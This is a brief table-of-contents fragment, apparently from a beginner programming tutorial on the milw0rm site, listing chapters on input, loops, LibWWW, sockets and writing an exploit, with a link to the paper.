05: Gathering User Input
06: Loops
07: LibWWW
08: Sockets
09: Writing an Exploit
0A: Furthering Knowledge
http://milw0rm.org/papers/85
|
|
|
|
|
|
|